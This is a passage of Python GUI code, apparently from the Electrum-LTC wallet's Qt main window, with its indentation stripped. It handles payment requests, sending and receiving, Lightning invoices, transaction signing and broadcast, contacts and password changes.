def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
            tooltip_text = _("Text copied to clipboard")
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Litecoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Litecoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs) as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Litecoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice, amount_sat=None):
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_sat, attempts)
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, key):
req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
def on_payment_succeeded(self, key, description=None):
self.show_message(_('Payment succeeded'))
self.need_update.set()
def on_payment_failed(self, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice = self.payto_e.lightning_invoice
if not invoice:
return
if not self.wallet.lnworker:
self.show_error(_('Lightning is disabled'))
return
invoice_dict = self.wallet.lnworker.parse_bech32_invoice(invoice)
if invoice_dict.get('amount') is None:
amount = self.amount_e.get_amount()
if amount:
invoice_dict['amount'] = amount
else:
self.show_error(_('No amount'))
return
return invoice_dict
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_clear()
self.do_pay_invoice(invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice['outputs']
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice):
if invoice['type'] == PR_TYPE_LN:
self.pay_lightning_invoice(invoice['invoice'], amount_sat=invoice['amount'])
elif invoice['type'] == PR_TYPE_ONCHAIN:
outputs = invoice['outputs']
self.pay_onchain_dialog(self.get_coins(), outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def pay_onchain_dialog(self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
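# Builds an unsigned transaction via make_tx(fee_est), asks the user to confirm (or preview),
# then signs and broadcasts it.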
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
self.show_message(_('Not Enough Funds'))
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
from electrum_ltc.lnaddr import lndecode, LnDecodeException
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.amount is not None:
self.amount_e.setAmount(lnaddr.amount * COIN)
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
invoice = self.wallet.get_invoice(key)
if invoice is None:
self.show_error('Cannot find payment request in wallet.')
return
bip70 = invoice.get('bip70')
if bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70))
pr.verify(self.contacts)
self.show_bip70_details(pr)
def show_bip70_details(self, pr: 'paymentrequest.PaymentRequest'):
key = pr.get_id()
d = WindowModalDialog(self, _("BIP70 Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x.value) + ' ' + self.base_unit() + ' @ ' + x.address, pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
# note: "delete" disabled as invoice is saved with a different key in wallet.invoices that we do not have here
# def do_delete():
# if self.question(_('Delete invoice?')):
# self.wallet.delete_invoice(key)
# self.history_list.update()
# self.invoice_list.update()
# d.close()
# deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, CloseButton(d)))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning() and self.network:
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if not self.network.is_lightning_running():
return
cur, total = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_percent = 0
progress_str = "??%"
if cur is not None and total is not None and total > 0:
# note: Progress is rescaled such that 95% is considered "done".
# "Real" progress can stay around 98-99% for a long time, which
# might needlessly worry users.
progress_percent = (1.0 / 0.95 * cur / total) * 100
progress_percent = min(progress_percent, 100)
progress_percent = round(progress_percent)
progress_str = f"{progress_percent}%"
if progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 4 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum_ltc.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
